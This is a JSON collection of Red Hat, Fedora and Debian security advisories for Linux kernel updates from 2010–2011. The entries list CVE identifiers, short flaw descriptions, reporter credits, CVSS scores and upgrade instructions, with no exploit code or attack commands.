"redhat": [{"lastseen": "2020-08-08T12:04:38", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3296", "CVE-2010-3877", "CVE-2010-4072", "CVE-2010-4073", "CVE-2010-4075", "CVE-2010-4080", "CVE-2010-4081", "CVE-2010-4158", "CVE-2010-4238", "CVE-2010-4243", "CVE-2010-4255", "CVE-2010-4263", "CVE-2010-4343"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A NULL pointer dereference flaw was found in the igb driver in the Linux\nkernel. If both the Single Root I/O Virtualization (SR-IOV) feature and\npromiscuous mode were enabled on an interface using igb, it could result in\na denial of service when a tagged VLAN packet is received on that\ninterface. (CVE-2010-4263, Important)\n\n* A missing sanity check was found in vbd_create() in the Xen hypervisor\nimplementation. As CD-ROM drives are not supported by the blkback back-end\ndriver, attempting to use a virtual CD-ROM drive with blkback could trigger\na denial of service (crash) on the host system running the Xen hypervisor.\n(CVE-2010-4238, Moderate)\n\n* A flaw was found in the Linux kernel execve() system call implementation.\nA local, unprivileged user could cause large amounts of memory to be\nallocated but not visible to the OOM (Out of Memory) killer, triggering a\ndenial of service. (CVE-2010-4243, Moderate)\n\n* A flaw was found in fixup_page_fault() in the Xen hypervisor\nimplementation. If a 64-bit para-virtualized guest accessed a certain area\nof memory, it could cause a denial of service on the host system running\nthe Xen hypervisor. (CVE-2010-4255, Moderate)\n\n* A missing initialization flaw was found in the bfa driver used by Brocade\nFibre Channel Host Bus Adapters. A local, unprivileged user could use this\nflaw to cause a denial of service by reading a file in the\n\"/sys/class/fc_host/host#/statistics/\" directory. (CVE-2010-4343, Moderate)\n\n* Missing initialization flaws in the Linux kernel could lead to\ninformation leaks. (CVE-2010-3296, CVE-2010-3877, CVE-2010-4072,\nCVE-2010-4073, CVE-2010-4075, CVE-2010-4080, CVE-2010-4081, CVE-2010-4158,\nLow)\n\nRed Hat would like to thank Kosuke Tatsukawa for reporting CVE-2010-4263;\nVladymyr Denysov for reporting CVE-2010-4238; Brad Spengler for reporting\nCVE-2010-4243; Dan Rosenberg for reporting CVE-2010-3296, CVE-2010-4073,\nCVE-2010-4075, CVE-2010-4080, CVE-2010-4081, and CVE-2010-4158; Vasiliy\nKulikov for reporting CVE-2010-3877; and Kees Cook for reporting\nCVE-2010-4072.\n\nThese updated packages also include several hundred bug fixes for and\nenhancements to the Linux kernel. Space precludes documenting each of these\nchanges in this advisory and users are directed to the Red Hat Enterprise\nLinux 5.6 Release Notes for information on the most significant of these\nchanges:\n\nhttp://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/5/html/5.6_Release_Notes/index.html\n\nRefer to the kernel chapter in the Red Hat Enterprise Linux 5.6 Technical\nNotes for further information:\n\nhttp://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/5/html/5.6_Technical_Notes/kernel.html\n\nAll Red Hat Enterprise Linux 5 users are advised to install these updated\npackages, which address these vulnerabilities as well as fixing the bugs\nand adding the enhancements noted in the Red Hat Enterprise Linux 5.6\nRelease Notes and Technical Notes. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T12:09:36", "published": "2011-01-13T05:00:00", "id": "RHSA-2011:0017", "href": "https://access.redhat.com/errata/RHSA-2011:0017", "type": "redhat", "title": "(RHSA-2011:0017) Important: Red Hat Enterprise Linux 5.6 kernel security and bug fix update", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-04T10:03:52", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3477", "CVE-2010-4160", "CVE-2010-4162", "CVE-2010-4163", "CVE-2010-4165", "CVE-2010-4242", "CVE-2010-4248", "CVE-2010-4249", "CVE-2010-4250", "CVE-2010-4346", "CVE-2010-4347", "CVE-2010-4565", "CVE-2010-4648", "CVE-2010-4649", "CVE-2010-4655", "CVE-2010-4656", "CVE-2010-4668", "CVE-2011-0521", "CVE-2011-1044"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* Missing boundary checks in the PPP over L2TP sockets implementation could\nallow a local, unprivileged user to cause a denial of service or escalate\ntheir privileges. (CVE-2010-4160, Important)\n\n* Integer overflow in ib_uverbs_poll_cq() could allow a local, unprivileged\nuser to cause a denial of service or escalate their privileges.\n(CVE-2010-4649, Important)\n\n* Missing boundary check in dvb_ca_ioctl() in the av7110 module. On systems\nusing old DVB cards requiring the av7110 module, a local, unprivileged user\ncould use this flaw to cause a denial of service or escalate their\nprivileges. (CVE-2011-0521, Important)\n\n* Flaw in tcf_act_police_dump() in the network traffic policing\nimplementation could allow a local, unprivileged user to cause an\ninformation leak. (CVE-2010-3477, Moderate)\n\n* Missing boundary checks in the block layer implementation could allow a\nlocal, unprivileged user to cause a denial of service. (CVE-2010-4162,\nCVE-2010-4163, CVE-2010-4668, Moderate)\n\n* Divide-by-zero flaw in tcp_select_initial_window() in the Linux kernel's\nTCP/IP protocol suite implementation could allow a local, unprivileged user\nto cause a denial of service. (CVE-2010-4165, Moderate)\n\n* NULL pointer dereference flaw in the Bluetooth HCI UART driver could\nallow a local, unprivileged user to cause a denial of service.\n(CVE-2010-4242, Moderate)\n\n* Flaw in the CPU time clocks implementation for the POSIX clock interface\ncould allow a local, unprivileged user to cause a denial of service.\n(CVE-2010-4248, Moderate)\n\n* Flaw in the garbage collector for AF_UNIX sockets could allow a local,\nunprivileged user to trigger a denial of service (out-of-memory condition).\n(CVE-2010-4249, Moderate)\n\n* Memory leak in the inotify_init() system call. In some cases, it could\nleak a group, which could allow a local, unprivileged user to eventually\ncause a denial of service. (CVE-2010-4250, Moderate)\n\n* /sys/kernel/debug/acpi/custom_method had world-writable permissions,\nwhich could allow a local, unprivileged user to escalate their privileges.\nNote: The debugfs file system must be mounted locally to exploit this\nissue. It is not mounted by default. (CVE-2010-4347, Moderate)\n\n* Heap overflow in iowarrior_write() could allow a user with access to an\nIO-Warrior USB device to cause a denial of service or escalate their\nprivileges. (CVE-2010-4656, Moderate)\n\n* Missing security check in the Linux kernel's implementation of the\ninstall_special_mapping routine could allow a local, unprivileged user to\nbypass the mmap_min_addr protection mechanism. (CVE-2010-4346, Low)\n\n* Information leak in bcm_connect() in the Controller Area Network (CAN)\nBroadcast Manager implementation could allow a local, unprivileged user to\nleak kernel mode addresses in /proc/net/can-bcm. (CVE-2010-4565, Low)\n\n* A logic error in orinoco_ioctl_set_auth() in the Linux kernel's ORiNOCO\nwireless extensions support implementation could render TKIP\ncountermeasures ineffective when it is enabled, as it enabled the card\ninstead of shutting it down. (CVE-2010-4648, Low)\n\n* Missing initialization flaw in ethtool_get_regs() could allow a local\nuser who has the CAP_NET_ADMIN capability to cause an information leak.\n(CVE-2010-4655, Low)\n\n* Flaw in ib_uverbs_poll_cq() could allow a local, unprivileged user to\ncause an information leak. (CVE-2011-1044, Low)\n\nRed Hat would like to thank Dan Rosenberg for reporting CVE-2010-4160,\nCVE-2010-4162, CVE-2010-4163, CVE-2010-4668, and CVE-2010-4565; Steve Chen\nfor reporting CVE-2010-4165; Alan Cox for reporting CVE-2010-4242; Vegard\nNossum for reporting CVE-2010-4249 and CVE-2010-4250; Kees Cook for\nreporting CVE-2010-4656 and CVE-2010-4655; and Tavis Ormandy for reporting\nCVE-2010-4346.\n\nThis update also fixes three bugs. Documentation for these bug fixes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n", "modified": "2019-03-22T23:44:22", "published": "2011-03-10T05:00:00", "id": "RHSA-2011:0330", "href": "https://access.redhat.com/errata/RHSA-2011:0330", "type": "redhat", "title": "(RHSA-2011:0330) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:59", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2962", "CVE-2010-3432", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-3858", "CVE-2010-3861", "CVE-2010-3874", "CVE-2010-3876", "CVE-2010-3880", "CVE-2010-4072", "CVE-2010-4073", "CVE-2010-4074", "CVE-2010-4075", "CVE-2010-4077", "CVE-2010-4079", "CVE-2010-4080", "CVE-2010-4082", "CVE-2010-4083", "CVE-2010-4157", "CVE-2010-4158", "CVE-2010-4169"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* Missing sanity checks in the Intel i915 driver in the Linux kernel could\nallow a local, unprivileged user to escalate their privileges.\n(CVE-2010-2962, Important)\n\n* A flaw in sctp_packet_config() in the Linux kernel's Stream Control\nTransmission Protocol (SCTP) implementation could allow a remote attacker\nto cause a denial of service. (CVE-2010-3432, Important)\n\n* A missing integer overflow check in snd_ctl_new() in the Linux kernel's\nsound subsystem could allow a local, unprivileged user on a 32-bit system\nto cause a denial of service or escalate their privileges. (CVE-2010-3442,\nImportant)\n\n* A flaw in sctp_auth_asoc_get_hmac() in the Linux kernel's SCTP\nimplementation. When iterating through the hmac_ids array, it did not reset\nthe last id element if it was out of range. This could allow a remote\nattacker to cause a denial of service. (CVE-2010-3705, Important)\n\n* Missing sanity checks in setup_arg_pages() in the Linux kernel. When\nmaking the size of the argument and environment area on the stack very\nlarge, it could trigger a BUG_ON(), resulting in a local denial of service.\n(CVE-2010-3858, Moderate)\n\n* A flaw in ethtool_get_rxnfc() in the Linux kernel's ethtool IOCTL\nhandler. When it is called with a large info.rule_cnt, it could allow a\nlocal user to cause an information leak. (CVE-2010-3861, Moderate)\n\n* A flaw in bcm_connect() in the Linux kernel's Controller Area Network\n(CAN) Broadcast Manager. On 64-bit systems, writing the socket address may\noverflow the procname character array. (CVE-2010-3874, Moderate)\n\n* A flaw in inet_csk_diag_dump() in the Linux kernel's module for\nmonitoring the sockets of INET transport protocols. By sending a netlink\nmessage with certain bytecode, a local, unprivileged user could cause a\ndenial of service. (CVE-2010-3880, Moderate)\n\n* Missing sanity checks in gdth_ioctl_alloc() in the gdth driver in the\nLinux kernel, could allow a local user with access to \"/dev/gdth\" on a\n64-bit system to cause a denial of service or escalate their privileges.\n(CVE-2010-4157, Moderate)\n\n* A use-after-free flaw in the mprotect() system call could allow a local,\nunprivileged user to cause a local denial of service. (CVE-2010-4169,\nModerate)\n\n* Missing initialization flaws in the Linux kernel could lead to\ninformation leaks. (CVE-2010-3876, CVE-2010-4072, CVE-2010-4073,\nCVE-2010-4074, CVE-2010-4075, CVE-2010-4077, CVE-2010-4079, CVE-2010-4080,\nCVE-2010-4082, CVE-2010-4083, CVE-2010-4158, Low)\n\nRed Hat would like to thank Kees Cook for reporting CVE-2010-2962,\nCVE-2010-3861, and CVE-2010-4072; Dan Rosenberg for reporting\nCVE-2010-3442, CVE-2010-3705, CVE-2010-3874, CVE-2010-4073, CVE-2010-4074,\nCVE-2010-4075, CVE-2010-4077, CVE-2010-4079, CVE-2010-4080, CVE-2010-4082,\nCVE-2010-4083, and CVE-2010-4158; Brad Spengler for reporting\nCVE-2010-3858; Nelson Elhage for reporting CVE-2010-3880; and Vasiliy\nKulikov for reporting CVE-2010-3876.\n\nBug fixes:\n\n* A vulnerability in the 32-bit compatibility code for the VIDIOCSMICROCODE\nIOCTL in the Video4Linux implementation. It does not affect Red Hat\nEnterprise MRG, but as a preventive measure, this update removes the code.\nRed Hat would like to thank Kees Cook for reporting this vulnerability.\n(BZ#642469)\n\n* The kernel-rt spec file was missing the crypto, drm, generated, and trace\nheader directories when generating the kernel-rt-devel package, resulting\nin out-of-tree modules failing to build. (BZ#608784)\n\n* On computers without a supported Performance Monitoring Unit, a crash\nwould occur when running the \"perf top\" command, and occasionally other\nperf commands. perf software events are now marked as IRQ safe to avoid\nthis crash. (BZ#647434)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2019-03-22T23:44:26", "published": "2010-12-08T05:00:00", "id": "RHSA-2010:0958", "href": "https://access.redhat.com/errata/RHSA-2010:0958", "type": "redhat", "title": "(RHSA-2010:0958) Important: kernel-rt security and bug fix update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2962", "CVE-2010-2963", "CVE-2010-3698", "CVE-2010-3880", "CVE-2010-3904", "CVE-2010-4072", "CVE-2010-4073", "CVE-2010-4163", "CVE-2010-4165", "CVE-2010-4346", "CVE-2010-4648", "CVE-2010-4649", "CVE-2010-4668", "CVE-2011-0006", "CVE-2011-0521"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2011-02-10T21:27:10", "published": "2011-02-10T21:27:10", "id": "FEDORA:BD6A910FBAE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: kernel-2.6.35.11-83.fc14", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2071", "CVE-2010-2478", "CVE-2010-2524", "CVE-2010-2955", "CVE-2010-2960", "CVE-2010-2962", "CVE-2010-2963", "CVE-2010-3067", "CVE-2010-3079", "CVE-2010-3080", "CVE-2010-3081", "CVE-2010-3301", "CVE-2010-3432", "CVE-2010-3442", "CVE-2010-3698", "CVE-2010-3705", "CVE-2010-3874", "CVE-2010-3880", "CVE-2010-3904", "CVE-2010-4072", "CVE-2010-4073", "CVE-2010-4082", "CVE-2010-4157", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4163", "CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4249", "CVE-2010-4258", "CVE-2010-4346", "CVE-2010-4648", "CVE-2010-4649", "CVE-2010-4650", "CVE-2010-4668", "CVE-2011-0006", "CVE-2011-0521", "CVE-2011-1044"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2011-03-07T21:06:13", "published": "2011-03-07T21:06:13", "id": "FEDORA:329D9110666", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: kernel-2.6.34.8-68.fc13", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2071", "CVE-2010-2478", "CVE-2010-2524", "CVE-2010-2955", "CVE-2010-2960", "CVE-2010-2962", "CVE-2010-2963", "CVE-2010-3067", "CVE-2010-3079", "CVE-2010-3080", "CVE-2010-3081", "CVE-2010-3084", "CVE-2010-3301", "CVE-2010-3432", "CVE-2010-3442", "CVE-2010-3698", "CVE-2010-3705", "CVE-2010-3874", "CVE-2010-3880", "CVE-2010-3904", "CVE-2010-4072", "CVE-2010-4073", "CVE-2010-4082", "CVE-2010-4157", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4163", "CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4249", "CVE-2010-4258", "CVE-2010-4346", "CVE-2010-4527", "CVE-2010-4648", "CVE-2010-4649", "CVE-2010-4650", "CVE-2010-4668", "CVE-2011-0006", "CVE-2011-0521", "CVE-2011-1013", "CVE-2011-1079", "CVE-2011-1093", "CVE-2011-1182", "CVE-2011-1494", "CVE-2011-1495", "CVE-2011-1745", "CVE-2011-1746", "CVE-2011-2022"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2011-06-21T17:22:40", "published": "2011-06-21T17:22:40", "id": "FEDORA:A272A110C4A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: kernel-2.6.34.9-69.fc13", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2071", "CVE-2010-2478", "CVE-2010-2524", "CVE-2010-2955", "CVE-2010-2960", "CVE-2010-2962", "CVE-2010-2963", "CVE-2010-3067", "CVE-2010-3079", "CVE-2010-3080", "CVE-2010-3081", "CVE-2010-3301", "CVE-2010-3432", "CVE-2010-3442", "CVE-2010-3698", "CVE-2010-3705", "CVE-2010-3874", "CVE-2010-3880", "CVE-2010-3904", "CVE-2010-4072", "CVE-2010-4073", "CVE-2010-4082", "CVE-2010-4157", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4169", "CVE-2010-4249", "CVE-2010-4258"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2010-12-23T19:56:17", "published": "2010-12-23T19:56:17", "id": "FEDORA:0DA9510F842", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: kernel-2.6.34.7-66.fc13", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:25:23", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4242", "CVE-2011-0521", "CVE-2010-4163", "CVE-2010-4529", "CVE-2010-4668", "CVE-2010-4346", "CVE-2010-4527", "CVE-2010-4649", "CVE-2010-0435", "CVE-2010-4656", "CVE-2010-4158", "CVE-2010-4526", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-4248", "CVE-2010-4243", "CVE-2010-4249", "CVE-2010-4342", "CVE-2010-3699", "CVE-2010-4565"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2153-1 security@debian.org\nhttp://www.debian.org/security/ dann frazier\nJanuary 30, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : privilege escalation/denial of service/information leak\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2010-0435 CVE-2010-3699 CVE-2010-4158 CVE-2010-4162 \n CVE-2010-4163 CVE-2010-4242 CVE-2010-4243 CVE-2010-4248 \n CVE-2010-4249 CVE-2010-4258 CVE-2010-4342 CVE-2010-4346 \n CVE-2010-4526 CVE-2010-4527 CVE-2010-4529 CVE-2010-4565 \n CVE-2010-4649 CVE-2010-4656 CVE-2010-4668 CVE-2011-0521\n\nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\nto a privilege escalation, denial of service or information leak. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2010-0435\n\n Gleb Napatov reported an issue in the KVM subsystem that allows virtual\n machines to cause a denial of service of the host machine by executing mov\n to/from DR instructions.\n\nCVE-2010-3699\n\n Keir Fraser provided a fix for an issue in the Xen subsystem. A guest can\n cause a denial of service on the host by retaining a leaked reference to a\n device. This can result in a zombie domain, xenwatch process hangs, and xm\n command failures.\n\nCVE-2010-4158\n\n Dan Rosenberg discovered an issue in the socket filters subsystem, allowing\n local unprivileged users to obtain the contents of sensitive kernel memory.\n\nCVE-2010-4162\n\n Dan Rosenberg discovered an overflow issue in the block I/O subsystem that\n allows local users to map large numbers of pages, resulting in a denial of\n service due to invocation of the out of memory killer.\n\nCVE-2010-4163\n\n Dan Rosenberg discovered an issue in the block I/O subsystem. Due to\n improper validation of iov segments, local users can trigger a kernel panic\n resulting in a denial of service.\n\nCVE-2010-4242\n\n Alan Cox reported an issue in the Bluetooth subsystem. Local users with\n sufficient permission to access HCI UART devices can cause a denial of\n service (NULL pointer dereference) due to a missing check for an existing\n tty write operation.\n\nCVE-2010-4243\n\n Brad Spengler reported a denial-of-service issue in the kernel memory\n accounting system. By passing large argv/envp values to exec, local users\n can cause the out of memory killer to kill processes owned by other users.\n\nCVE-2010-4248\n\n Oleg Nesterov reported an issue in the POSIX CPU timers subsystem. Local\n users can cause a denial of service (Oops) due to incorrect assumptions\n about thread group leader behavior.\n\nCVE-2010-4249\n\n Vegard Nossum reported an issue with the UNIX socket garbage collector.\n Local users can consume all of LOWMEM and decrease system performance by\n overloading the system with inflight sockets.\n\nCVE-2010-4258\n\n Nelson Elhage reported an issue in Linux oops handling. Local users may be\n able to obtain elevated privileges if they are able to trigger an oops with\n a process' fs set to KERNEL_DS.\n\nCVE-2010-4342\n\n Nelson Elhage reported an issue in the econet protocol. Remote attackers can\n cause a denial of service by sending an Acorn Universal Networking packet\n over UDP.\n\nCVE-2010-4346\n\n Tavis Ormandy discovered an issue in the install_special_mapping routine\n which allows local users to bypass the mmap_min_addr security restriction.\n Combined with an otherwise low severity local denial of service\n vulnerability (NULL pointer dereference), a local user could obtain elevated\n privileges.\n\nCVE-2010-4526\n\n Eugene Teo reported a race condition in the Linux SCTP implementation.\n Remote users can cause a denial of service (kernel memory corruption) by\n transmitting an ICMP unreachable message to a locked socket.\n\nCVE-2010-4527\n\n Dan Rosenberg reported two issues in the OSS soundcard driver. Local users\n with access to the device (members of group 'audio' on default Debian\n installations) may contain access to sensitive kernel memory or cause a\n buffer overflow, potentially leading to an escalation of privileges.\n\nCVE-2010-4529\n\n Dan Rosenberg reported an issue in the Linux kernel IrDA socket\n implementation on non-x86 architectures. Local users may be able to gain\n access to sensitive kernel memory via a specially crafted IRLMP_ENUMDEVICES\n getsockopt call.\n\nCVE-2010-4565\n\n Dan Rosenberg reported an issue in the Linux CAN protocol implementation.\n Local users can obtain the address of a kernel heap object which might help\n facilitate system exploitation.\n\nCVE-2010-4649\n\n Dan Carpenter reported an issue in the uverb handling of the InfiniBand\n subsystem. A potential buffer overflow may allow local users to cause a\n denial of service (memory corruption) by passing in a large cmd.ne value.\n\nCVE-2010-4656\n\n Kees Cook reported an issue in the driver for I/O-Warrior USB devices.\n Local users with access to these devices maybe able to overrun kernel\n buffers, resulting in a denial of service or privilege escalation.\n\nCVE-2010-4668\n\n Dan Rosenberg reported an issue in the block subsystem. A local user can\n cause a denial of service (kernel panic) by submitting certain 0-length I/O\n requests.\n\nCVE-2011-0521\n\n Dan Carpenter reported an issue in the DVB driver for AV7110 cards. Local\n users can pass a negative info->num value, corrupting kernel memory and\n causing a denial of service.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.6.26-26lenny2.\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n Debian 5.0 (lenny)\n user-mode-linux 2.6.26-1um-2+26lenny2\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages.\n\nNote that these updates will not become active until after your system is\nrebooted.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2011-01-30T06:42:19", "published": "2011-01-30T06:42:19", "id": "DEBIAN:DSA-2153-1:FDD6A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00017.html", "title": "[SECURITY] [DSA 2153-1] linux-2.6 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}